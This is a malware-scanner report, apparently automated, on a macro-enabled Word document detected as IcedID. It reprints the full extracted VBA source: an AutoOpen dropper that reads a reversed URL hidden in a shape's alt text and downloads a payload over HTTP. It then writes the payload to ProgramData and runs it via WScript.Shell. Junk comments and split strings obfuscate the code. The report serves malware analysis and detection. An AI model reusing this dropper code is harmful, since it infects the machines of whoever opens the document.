MALICIOUS
230
Risk Score
Heuristics 6
-
ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set ZaZny = CreateObject("Script" + AgsMH) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11783 bytes |
SHA-256: 421c99eec8d5af69cc35afd4fae6d521855d557de5a8ef0ba034c491e3f047f4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "sgCej"
Sub zMYMk(fZvzC, Optional ByVal acHHl As String = "c:\programdata\GKLHy.txt", Optional ByVal AgsMH As String = "ing.FileSystemObject")
' Lures nasally helplessness
' Senoritas pencilled eavesdrop
' Drapes invitingly sinusoidal jerboas
' Impression allowing
' Nattering misrepresents commences
' Collapse cents
' Gossips prosecutable hakea
' Velour dutifulness consolations percussed
' Alarmism planting talker
' Subject satsumas goofing anticipation bonanza
' Thought clusters sturdiest peerless
' Jointed overpower joule bladders
' Unentered
' Hawaiian
' Bantered
' Shelf bitts leave matriarchies deepening
' Referent hardpressed
Set ZaZny = CreateObject("Script" + AgsMH)
' Soup cabby synthetics circadian
' Clearness crimped magmatic leniently
' Devalued economics sectioning apostasy
' Comestible unnervingly climbed
' Crosschecked frostier doted loaner sunrise
Set EdibZ = ZaZny.CreateTextFile(acHHl)
' Candelas
' Ladyship exotica overstates essen
' Overcoat decimation nasty
' Perplexedly rottenness historicist defining
' Divorce facilities fringy
EdibZ.WriteLine fZvzC
' Shuffling egret numskull seamstress crusher
' Interbreed
' Brisker feared
' Leadfree flack kinsmen
' Owners cavity lifeless
EdibZ.Close
' Chlorine copperplate perimeter snarl averred added flaunted
' Insomniacs possibly
' Setter pager quelled mechanistic belfry
' Escalate
' Garrison miner
' Brainlessness mended arcading
' Specialities
' Customise
' Lips discourteous seraphic unassailed
' Fragrances
' Negotiation neatens
' Aftercare permeated cloak powdery spike punitive
' Haemophiliacs allotted confederate colonial
' Defeater experience fatwa
' Extenuate stumpy absences indicating
' Amethystine pestilential condenser
' Extended
' Toothier tribunal furnished
' Oaks propane denoted retainer needs
' Interlocutors survivals granaries wary
' Goofs lenient
' Bags hover fleecy
' Surrealists garbling ebony strifes
' Shunning aliphatic
' Breezes disruptively part sac roulette
' Bonny flexion silhouetted accountancy airraid
' Appraises diminishes chairwomen votes
' Militates chambered manipulators hearsay womanise episcopacy
' Ballooning apportions undemocratic
' Temptations mobilises quailed
' Aqueous withers corroborate snoozing lactic
' Scalds
' Beholding loquacious
' Sweltering splattering percolate
' Totalitarian dote
' Withstood intersections trounces predisposed palatability
' Volunteer possession disassemble
' Custodial longitude
End Sub
' Sinusitis glittering discontented
' Trappings buccaneering disapprove
' Spars
' Steadygoing busybodies explore bard gunship consecrated
' Shudders contractually germinal
Sub AutoOpen()
' Six voice scoot spiced crofts
' Pork pyroxene
' Backwards pimply reciprocity
' Demilitarisation
' Jettisoning perseveringly
' Etui budded at
' Sixfold dissuaded likens
' Powerless provocations jilting
' Experimentalists
' Righthanded crispiest commissioners piteous renege
' Fusses curators channels
' Input impeachments retorting
' Pathos doorbells systolic
' Footprints blocky adaptability squirted
' Triviality grimacing teardrop
' Configured sportive genteel annoyers tremendously
' Assassination abstain pipeline
' Collisional outface
' Leakage photocopying
' Interoperability sunflower
' Ensemble sided
' Lab scoring shortages curses
' Hungriest superlatives
' Nestegg streetwise gumshoe
' Oedema suits
' Kingsized pertinent unprivileged
' Acidrain halting checklists magnolia silt
Dim GdSiS As New FMZUk
' Chancing repeats dysfunctional
' Paradoxical counterbalance humouring baggier salvages
' Exacerbating beaked busker
' Environmentalist
' Bacterium spiked regally ablates
' Crypts
' Abdominal tankard supercomputer dryness overpayment
fZvzC = GdSiS.VhfkK("MSXML2.serverXMLHTTP")
' Nonexistent
' Pathologies pooch
' Undernourishment gobbling drool
' Friskiest stockade
' Cervix isolated enumerable
' Strolls velodrome secretary
' Groundswell cornea emulator
zMYMk YXqlK(fZvzC)
' Lecher pupated
' Mannerism flavours laden
' Astronomer bearable verdure
' Typically comas groper
' Shortsightedness rifting
' Exhaustively grudgingly
' Bloodsports throwing afforestation wrestling
' Stole castaway lamina
' Disease chicanery tincture
' Graphical striver daunts
' Volts herb secessions whine
' Tubular decorator dismaying cortege
vxDJF kBNex(0) + "vr32 c:\programdata\GKLHy.txt", "ws"
End Sub
Function wijDG(tAPgr, ohCyp)
' Explains snits
' Three coda
' Slip
' Amours monthlies uncalibrated
wijDG = Split(tAPgr, ohCyp)
End Function
Attribute VB_Name = "wMBfi"
' Quartic clubroom smokeless clouding pureness renowned
' Insularity indexer richer
' Bevels steadfast
' Blasted exudate undergrounds postmen livelier overcapacity
' Sociable
' Comber resourceful
Function YXqlK(RpYMV)
' Soots
' Stablemate brotherhood
' Sleeplessness disinterested
' Walruses fulfil joked
YXqlK = StrConv(RpYMV, vbUnicode)
' Franc
' Churlishness absentmindedly mileposts nimbleness farmsteads unlicensed interrogatives
' Granular dawned complainingly
' Underskirt feminism
' Burgeoning san
End Function
' Exterminate loony infringes teenager
' Hoarser twinge really reformations
' Rainwater vestige casualty masseuses handy blackmailing hones tights
' Tropopause godsend scratchy
' Maturity centrifuges crumples
' Stopwatch vegetate drizzle burners breadwinner
Function JmLHe()
' Dublin sherries typifies uncreased
' Magneto antifreeze chandler hooray interesting
' Revitalise freezer homecoming authenticates
' Televised
' Episode axiomatic ballad
' Hymnal tuesday unorthodox cajole warmness
' Amalgams overspill oversensitivity ergodic argued
' Incurred extractions preserving appendix catchphrases
' Immunities seem
' Palaeontologist entail corroborates
With ActiveDocument.shapes(1)
JmLHe = .AlternativeText
End With
End Function
' Loves elongate expectancies
' Archaeology collectables speckled
' Canadian pesticide emotionally unclouded talented mysteriously hermetic
' Modality dismantling
' Muffler parlour kebabs similitude sinews
' Dimmest loads
Function kBNex(ccvfP)
' Splittings decay gyrating morphisms
' Fixation ringlets
' Deliberative solidarity juvenile flood
' Prince corrodes sating gratify
' Politically correctors
' Standardisation subroutine secateurs pulverised
' Chow helterskelter
' Pitted occupants earaches colonnade
' Telephony headmistress bladed cabbages moles
' Vulcanised dassie hexameter dahlia
' Nationalisation racketeering pedagogically roadway gagged
' Nullity refutable aupairs
FXSKU = JmLHe()
GufpG = wijDG(FXSKU, "###")
iUVCk = GufpG(ccvfP)
kBNex = iUVCk
End Function
Attribute VB_Name = "FMZUk"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Froze governesses
' Ford crochets
' Hear
' Soldered conkers coquettish impracticability
Function VhfkK(bzaia)
' Sensation penknife
' Unbeliever gluttony motherofpearl syrups
' Protest
' Madrigals khaki soot import
' Blamelessly paining
' Subsoil sturdily legumes fidgety ascertains foramen tradings
Dim Ywxvu As Object
' Waistband
' Van polymers
' Iconographic splashy modernists
' Peculiar
' Computes lamed registers
' Unmemorable dankest deviate phonon
' Copulations crossbow healthiest forged clones churchman
' Fingerless interrupting
' Unobtrusive amputees profiteering submarines putt
' Guide angola mastering dismal tactile
' Screenwriter
' Relentless weddings prolongation nomad instigating
Set Ywxvu = CreateObject(bzaia)
' Tinge nylons
' Parametrisation tippling bleakness tumbled
' Earthbound shindig
' Devilled delaying gamy roundel
' Loser clone tolerating
' Dispensation quasar businesswoman
' Luxuriously juniper
' Receptor inundate boneless startups prejudicial
' Mostly guffaws responsibly notes eel
' Blameworthy wallflower reissued judiciously
' Foreseeing farmhouse
' Bogged gravitas propagate crimes
' Forgiven
' Fatherly innovating yaws petitions
' Rage goodlooking pecking
' Headlines testers
' Subclasses charlie
' Saving eg anchorite compatibility martens
' Ministering stashes wriggling
' Forceful
' Ladle emblematic gynaecology
' Presenting lovingly neuronal decorum
' Drugs deranged
' Unbroken iterating drown scotfree
' Proportional hail vulgarly
' Ripened undying
' Enviable fugitives tens prunings sagely
LJSGF = kBNex(1)
' Invasions reconsult hegemonic replier formic priories dispatcher
' Molar inconsiderateness bonbon
' Romping halfway herds normed digressed swung gals
' Pasty situate
Ywxvu.Open "GET", Reverse(LJSGF), False
' Absolved overnight
' Thinkable
' Librettists writings wafture boracic
' Ghastliest
Ywxvu.Send
' Culturally drools kedgeree sequin gamete
' Curtilage stammering parenthetical ablation
' Fewest saps
' Trap curd
' Endued mushroomed densitometry
' Awaits memorials deteriorates resea epistles
VhfkK = Ywxvu.responsebody
End Function
Attribute VB_Name = "HGhgQ"
Sub vxDJF(RHhQj, vToxs)
' Otherness gooey cellulite
' Cannoned indirection
' Disintegration attesting ruptures
' Romanticises wenches
' Decoupled expertly alluvia hexagon scowls dew
' Gallivanted liberals
Set rCNyB = CreateObject(vToxs + "cript.shell")
' Mostly prawns masks contemporaneity peddlers integrative
' Dubbed increase fishmonger
' Skyward rash
' Melancholic scarred girder ancestor troopship
' Magniloquent
' Veritable deceitfulness
' Illegibly strenuously exemplify
' Obscurely missile promised encircling
' Suckle impatiently beans
' Haulers familiarise
' Configurable hibernal
' Alcove diphtheria hoarsely
' Glimpses
' Punitive immovable depositions
' Disarrayed polity electrocardiographic answering sixteen enrichments
' Rakish stink rep quiveringly slowness
' Helpful martyr interdict
' Hoover frustratedly mappable
' Iceage calcify smilingly
' Needling onuses gawpin elbow
' Ranters mapper
' Phrenological limit kinematics sickens reporters
' Proletarians apogee rafting
' Lifesaving exponentiation
' Lawless interrelated
' Obnoxiously enhances
' Neuroscientists prompt
' Enraged stitches hart
' Ascetic participle drapers hiring dictator
' Interoperable driest sedater disheartened
' Stacking pilgrims sandbanks
' Heathen powersharing maseru encroaches circumscribing
' Corroboration apache kinetic
' Courtesan perverts grazing weathers retaliate
' Fastness licensing
' Admittance wheedled femininity constitutions
' Internal clued disguised
' Mist attired
' Cyprian invulnerability arrowed
' Authorised
' Pharmaceuticals uprightly cahoots wanton launches
' Sternum cultivates crimes incidents abstentions dirtiest
' Uncovers hones inefficiency tolerate
' Intensification truncate perverts
' Boohoo webs enemy multilayer
rCNyB.exec RHhQj
' Boastfulness strongmen inelegant
' Residues aspect mitigate shorted animation perversely lookalikes
' Parakeets
' Poverty spacial edges
' Impressionistic shipwrecked waiver
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 44544 bytes |
SHA-256: 65d998971008c5350aae82543eb567f2df5bd280eb98ed36a9fd7898ff0717e9 |
|||
|
Detection
ClamAV:
Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.